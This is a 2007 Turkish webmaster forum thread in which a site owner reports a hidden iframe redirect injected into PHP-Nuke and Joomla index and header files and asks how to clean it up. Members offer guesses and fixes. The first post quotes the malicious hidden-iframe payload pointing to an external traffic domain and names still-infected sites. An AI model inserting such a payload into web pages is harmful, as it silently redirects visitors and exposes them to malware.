Anasayfa FORUMLAR Üye Girişi Dosyalar Dersler İpuçları Yardımcı Araçlar Hakkımızda
KİMLER BAĞLI
Toplam Üye: 32638
Aktif Üye: 0
Aktif Ziyaretçi: 965
Üye Adı
Şifre
Beni Hatırla
          Yeni Üye KayıtYeni Üye Kayıt
          Şifremi UnuttumŞifremi Unuttum
FORUMLAR
 Nuke sentinelin sorgulama..
(4683 okuma, 0 yanıt)
 dizin CHMOD ları değişmiy..
(7875 okuma, 6 yanıt)
 3.3Patch Hakkında Versiyo..
(3280 okuma, 0 yanıt)
 nuke sentinel 2.6.01 kura..
(9587 okuma, 10 yanıt)
 Nuke Sentinel..
(4320 okuma, 2 yanıt)
 Nuke 8.0 Guvenlik..
(4852 okuma, 2 yanıt)
 Php Nuke 8.0 Güvenlik asa..
(3402 okuma, 0 yanıt)
 php nuke 8 kurdum güvenli..
(9891 okuma, 10 yanıt)
 Arkadaslar Lütfen Yardımc..
(9155 okuma, 9 yanıt)
 Site hacklendi sanırım.....
(5117 okuma, 2 yanıt)
 Hadi Protector Kuralım..
(40450 okuma, 45 yanıt)
 Bu bir saldırmı..
(8036 okuma, 7 yanıt)
 siteme virüs girmis..
(8163 okuma, 6 yanıt)
 Sitedekileri atmak..
(5121 okuma, 2 yanıt)
 Kötü botları engellemek...
(11021 okuma, 10 yanıt)
 2 dakika içinde 5 farklı ..
(7077 okuma, 5 yanıt)
 index atılamayan site yap..
(6949 okuma, 5 yanıt)
 Sanal Klavye Uygulamasi H..
(5234 okuma, 2 yanıt)
 js trojandownloader.agent..
(5669 okuma, 4 yanıt)
 Güvenlik konusunda yardım..
(7365 okuma, 8 yanıt)
 Sunucu firması websiteme ..
(4866 okuma, 2 yanıt)
 siteme saldirimi olmus?..
(5846 okuma, 4 yanıt)
 Protector bir işe yaramıy..
(13634 okuma, 15 yanıt)
 Nuke Sentinel 242 pl5 ( 7..
(26225 okuma, 25 yanıt)
 hacklendim mi?..
(5907 okuma, 4 yanıt)
 Güvenli prefix değiştirme..
(75349 okuma, 108 yanıt)
 7.6 ya 3.2 pack nasıl yap..
(4385 okuma, 1 yanıt)
 Site neden Google i banla..
(4125 okuma, 1 yanıt)
 PhpMyadminden toplu isim ..
(6132 okuma, 4 yanıt)
 sentinel güvenlik sistemi..
(7157 okuma, 6 yanıt)
 Sitemdeki Bu Acik Neyden ..
(7203 okuma, 6 yanıt)
 Saldırı yedim BW dolmuş. ..
(9649 okuma, 9 yanıt)
 sürümünüz < 7.8 ise s..
(6931 okuma, 5 yanıt)
 forum için kod yazma yasa..
(4849 okuma, 2 yanıt)
 Arkadaşlar hacklendim seb..
(4634 okuma, 2 yanıt)
 KENDİ TOLBARIMIMDAN AYDA ..
(5187 okuma, 3 yanıt)
 Bütün indexler değişmiş, ..
(4700 okuma, 3 yanıt)
 Çok sorulu, çok şıklı ank..
(3421 okuma, 0 yanıt)
 Protector' deki Host İs..
(3436 okuma, 0 yanıt)
 php nuke dosyaları şifrel..
(7459 okuma, 7 yanıt)
 index dosyasının chmod k..
(4008 okuma, 1 yanıt)
 AdminBox-1.0.3 Kurulumund..
(3585 okuma, 0 yanıt)
 gec saatlerde hızlanan tr..
(7746 okuma, 8 yanıt)
 Prefix değiştirmede coppe..
(4430 okuma, 1 yanıt)
 Nuke Güvenlik..
(157339 okuma, 257 yanıt)
 bütün index lere iframe e..
(18399 okuma, 24 yanıt)
 Nuke Sentinel Google bot ..
(5629 okuma, 4 yanıt)
 Siteme Sürekli Üye Oluyor..
(23939 okuma, 28 yanıt)
 Yeni iframe virüsler kodl..
(18661 okuma, 23 yanıt)
 Nuke Versiyonları Hakkın..
(3729 okuma, 0 yanıt)
Netopsiyon Online: Forums
Netopsiyon Online :: Başlık görüntüleniyor - php genel açık
 AramaArama   RütbelerRütbeliler   ProfilProfil   GirişGiriş 


php genel açık

 
Bu forum kilitlendi: mesaj gönderemez, cevap yazamaz ya da başlıkları değiştiremezsiniz   Bu başlık kilitlendi: mesajları değiştiremez ya da cevap yazamazsınız    Netopsiyon Online Forum Ana Sayfa -> Php-Nuke -> Php Nuke Güvenlik
Önceki başlık :: Sonraki başlık  
Yazar Mesaj
BoDY_GuaRD
Mesaj: 50+
Mesaj: 50+





Kayıt: Nov 03, 2004
Mesajlar: 53
Konum: Kasyeri

MesajTarih: 2007-05-29, 16:28:46    Mesaj konusu: php genel açık Alıntıyla Cevap Gönder

merhaba.

reseller hesabım var. 8 tane site var içerisinde.

1 tanesi php-nuke gerisi joomla

bugün sitemin dosyalarına bir kaç kod atmışlar.
yönlendirme kodları.

nasıl attılar bilmiyorum ama bütün php sitelere atılmış.

www.idealtarimsulama.com
www.dedikodulu.net

biri joomla diğeri php-nuke

atılan kod ise

Kod:
<i f r a m e name='StatPage' src='http://www.555traff.biz/trf/traf.php' width=5 height=5 style='display:none'></i f r a m e>


nasıl düzeltirim, bunu neden yapmışlar amaçları nedir, bir daha olmaması için neler yapabilirim.

bu arada php-nukede yazdıkları yerler index.php ve themes klasöründeki header.html felan
Başa dön
Kullanıcının profilini görüntüle Özel mesaj gönder Yazarın web sitesini ziyaret et AIM Adresi Yahoo Messenger MSN Messenger
Bu Site Google Adsense ile Gelir Elde Ediyor









Tarih: 2024-05-02, 09:34:47    Mesaj konusu: Forum Arası Reklamlar


Başa dön
Aliosman
Teknik Yönetici
Teknik Yönetici





Kayıt: Jul 20, 2002
Mesajlar: 3836
Konum: Balıkesir

MesajTarih: 2007-05-29, 17:06:17    Mesaj konusu: Alıntıyla Cevap Gönder

Joomla kullanan sitelerin sahiplerini kontrol edin. calender, uuhp gibi güvenliği zayıf componentleri olanlar kaldırsın. Ayrıca kurulum ve sonrası ayarları bitirdilerse 777 olan klasör CHMOD değerlerini 755 seviyesine geri getirsinler. Birşey ekleyecekleri zaman tekrar 777 yapıp kullanabilirler. Sonrasında tekrar tabii 755 seviyesine getirsinler.

php-nuke kullanan sitede resim galerisi yada upload gerektiren bir uygulama varsa kaldırsın.

Kodu ekledikleri yerleri bulup, tek tek silmelisiniz. Kodu ararken veritabanına da bakmayı unutmayın.
Başa dön
Kullanıcının profilini görüntüle Özel mesaj gönder Yazarın web sitesini ziyaret et
ERSAT
Mesaj: 200+
Mesaj: 200+





Kayıt: Mar 23, 2005
Mesajlar: 249

MesajTarih: 2007-05-29, 17:49:00    Mesaj konusu: Alıntıyla Cevap Gönder

Bu php açığı değil. Kendi PC'nize virüs giriyor ve uzantısı asp, php, html vs. web sayfası dosyalarına bu i f r a m e kodunu atıyor.
Sizde farkında olmadan siteye upload ediyorsunuz.
Başa dön
Kullanıcının profilini görüntüle Özel mesaj gönder
Sercan
Mesaj: 1000+
Mesaj: 1000+





Kayıt: Jan 07, 2006
Mesajlar: 1719
Konum: İstanbuL //

MesajTarih: 2007-05-29, 18:29:28    Mesaj konusu: Alıntıyla Cevap Gönder

çoğumuzun bilgisayarında nuke arşivleri falan var bu virüs nereden bulaşıyor ?
Başa dön
Kullanıcının profilini görüntüle Özel mesaj gönder Yazarın web sitesini ziyaret et
sosge
Mesaj: 200+
Mesaj: 200+





Kayıt: Nov 28, 2004
Mesajlar: 240
Konum: belcika

MesajTarih: 2007-05-29, 21:27:26    Mesaj konusu: Alıntıyla Cevap Gönder

Şu anda Senin sitene girdim ve benim pcmede bulasti bulassin 2 dakkalik omru var bende .. herneyse konuya donelim bundan kurtalmanin tek yolu hostcunla konusacaksin 1 hafta onceki yedekleri sitene atmadan once

ftpni kople sileceksin
veri tabanina kadar sonra eski yedekleri atacaksin modules/Forums/admin kalsorunun chmod ayarini 666 yap phpnuke icin işin oldugunda 777 yapar işini gorur tekrar cıkar 666 yaparsin en basit korunma yontemi bu resim galerisi aliosmanin dedigi gibi pcden avatar yukleme resim album modulu vs gibi eklentiler kullaniyorsan onlarin aciklarini kapatmalisin su anda o virus senin hostunda adi index. asp php html htm cgi yani adi index olan her seyde var kaspersky 5.0 yukleyin guncelleyin ve pc nizden silin n restore dosyalariniza bulasiyor ve hic bir virus programi tanımıyor kspersky haric..



insallah aciklayici bir cevap vermisismdir gecen hafta benim basima geldi cunki ben yasadim ve mümkünse sana zahmet linkleride sil mesajindan cunki bir cok arkadasin pcsinde anti virüs yok


ARKADASLAR ÜSTTEKİ SİTEYE GİRMEYİN BENDEN SİZE TAVSİYE ..
Başa dön
Kullanıcının profilini görüntüle Özel mesaj gönder Yahoo Messenger MSN Messenger
BoDY_GuaRD
Mesaj: 50+
Mesaj: 50+





Kayıt: Nov 03, 2004
Mesajlar: 53
Konum: Kasyeri

MesajTarih: 2007-05-29, 22:36:49    Mesaj konusu: Alıntıyla Cevap Gönder

sosge :
Şu anda Senin sitene girdim ve benim pcmede bulasti bulassin 2 dakkalik omru var bende .. herneyse konuya donelim bundan kurtalmanin tek yolu hostcunla konusacaksin 1 hafta onceki yedekleri sitene atmadan once

ftpni kople sileceksin
veri tabanina kadar sonra eski yedekleri atacaksin modules/Forums/admin kalsorunun chmod ayarini 666 yap phpnuke icin işin oldugunda 777 yapar işini gorur tekrar cıkar 666 yaparsin en basit korunma yontemi bu resim galerisi aliosmanin dedigi gibi pcden avatar yukleme resim album modulu vs gibi eklentiler kullaniyorsan onlarin aciklarini kapatmalisin su anda o virus senin hostunda adi index. asp php html htm cgi yani adi index olan her seyde var kaspersky 5.0 yukleyin guncelleyin ve pc nizden silin n restore dosyalariniza bulasiyor ve hic bir virus programi tanımıyor kspersky haric..



insallah aciklayici bir cevap vermisismdir gecen hafta benim basima geldi cunki ben yasadim ve mümkünse sana zahmet linkleride sil mesajindan cunki bir cok arkadasin pcsinde anti virüs yok


ARKADASLAR ÜSTTEKİ SİTEYE GİRMEYİN BENDEN SİZE TAVSİYE ..



yorumun için teşekkür ederimde. bu virüs dediğin gibi bir bilgisayara bulaşmış, ondan sonra benim gezdiğim sitelere upload eden bir sistem değil.

bu virüs host makinasındaki bir siteye bir şekilde bulaşmış, ancak nasıl bir yazılımı varsa, makinadaki bütün sitelere kendini eklemiş.
hemde eklenme dosyalarına baksanız, ftp şifresini bilen adam bile zor ekler.

yani dediğin gibi benim bilgisayarıma bulaşıpda siteye bilmeden eklenecek vs.. tarzda bişi değil ki ben 2 haftadır ftp vs.. girmiyorum

+ öyle bişi olsa bile host makinasındaki bütün siteleri ziyaret edip hepsine ben bulaştıramam..

nasıl yayılıyor bende bilmiyorum ama www.dedikodulu.net bunun bütün dosyalarını temizledim. dediğin gibi bulaşacak birşey yok.

www.idealtarimsulama.com ise bunu temizlemedim. bu site üzerinden nasıl birşey olduğunu millet görsün tesbit edelim diye.

Aliosman bey ;

sitemde belirtiğiniz gibi bir açık yok. dosya modu , resim galeri yüklenmesi vs..

yukardada belirtiğim gibi açıkla alakalı değil. bir şekilde bu makinadaki bütün sitelere bulaşmış.

bu son günde moda bir olay bir kaç host makinasına daha olmuş.

zannedersem yakında çoğumuzun başına gelecek.

çünki v bullettin, joomla vs.. farketmiyo.

yeterki php olsun kendini ekliyor
Başa dön
Kullanıcının profilini görüntüle Özel mesaj gönder Yazarın web sitesini ziyaret et AIM Adresi Yahoo Messenger MSN Messenger
24872
Mesaj: 50+
Mesaj: 50+





Kayıt: Aug 07, 2006
Mesajlar: 93

MesajTarih: 2007-05-29, 23:10:02    Mesaj konusu: Re: php genel açık Alıntıyla Cevap Gönder

gözlemlediğim kadar bunun açıkla falan ilgisi yok. biri bilerek bir siteye yerleştirmiş . o siteye girildiği zaman virus senin bilgisayara iniyor ki genelde masaüstüne bir exe dosyası atıyor. sonra bu exe senin bilgisayrdaki ftp accountlarıyla senin sitelerine de ekliyor.

sadece php değil. html dosyalarına da ekleniyor.
Başa dön
Kullanıcının profilini görüntüle Özel mesaj gönder
seyranli
Mesaj: 1000+
Mesaj: 1000+





Kayıt: May 16, 2005
Mesajlar: 3511
Konum: oradan

MesajTarih: 2007-05-30, 01:34:46    Mesaj konusu: Alıntıyla Cevap Gönder

kendi bilgisayarınızla alakalı. eğer hostunuzda herhangi bir antivirüs yoksa hosta da bulaştırmış olabilirsiniz. kaspersky 6.1 + full update ile bu virüs engelleniyor, nod32 bulmuyor
Başa dön
Kullanıcının profilini görüntüle Özel mesaj gönder
Bu Site Google Adsense ile Gelir Elde Ediyor









Tarih: 2024-05-02, 09:34:47    Mesaj konusu: Forum Arası Reklamlar


Başa dön
Önceki mesajları göster:   
Bu forum kilitlendi: mesaj gönderemez, cevap yazamaz ya da başlıkları değiştiremezsiniz   Bu başlık kilitlendi: mesajları değiştiremez ya da cevap yazamazsınız    Netopsiyon Online Forum Ana Sayfa -> Php-Nuke -> Php Nuke Güvenlik Tüm zamanlar GMT + 3 Saat
1. sayfa (Toplam 1 sayfa)

 
Geçiş Yap:  
Bu forumda yeni başlıklar açamazsınız
Bu forumdaki başlıklara cevap veremezsiniz
Bu forumdaki mesajlarınızı değiştiremezsiniz
Bu forumdaki mesajlarınızı silemezsiniz
Bu forumdaki anketlerde oy kullanamazsınız

Benzer Konular

Başlık Yazar Forum Cevaplar Tarih
Yeni mesaj yok Tema Seçimini Misafirlere De Açık Tutmak cyprus_tde Php Nuke Sorunlarınız 7 2010-03-14, 16:32:49 Son Mesajı Görüntüle
Yeni mesaj yok Forum Yönetiminde İzinlerde Genel Hat... sofualanli Php Nuke Sorunlarınız 0 2010-01-05, 23:17:15 Son Mesajı Görüntüle
Yeni mesaj yok Windows güncelleştirmeleriniz açık mı... Sergen İnternet Üzerine 16 2009-11-08, 11:50:32 Son Mesajı Görüntüle
Yeni mesaj yok acık artırma modulu varmı? postakusu Php Nuke Modülleri 0 2009-10-02, 22:17:45 Son Mesajı Görüntüle
Yeni mesaj yok İnternette tk alan adı için açık artt... hamzot Domain Pazarı 0 2009-09-04, 10:11:37 Son Mesajı Görüntüle

Copyright © 2002-2024 Netopsiyon Bilişim Teknolojileri San. Tic. Ltd.Şti. - Bütün hakları saklıdır!
Bu site Netopsiyon.com.tr Sunucularında Barındırılmaktadır.
Netopsiyon Bilişim Teknolojileri San. Tic. Ltd.Şti. Netopsiyon Copyright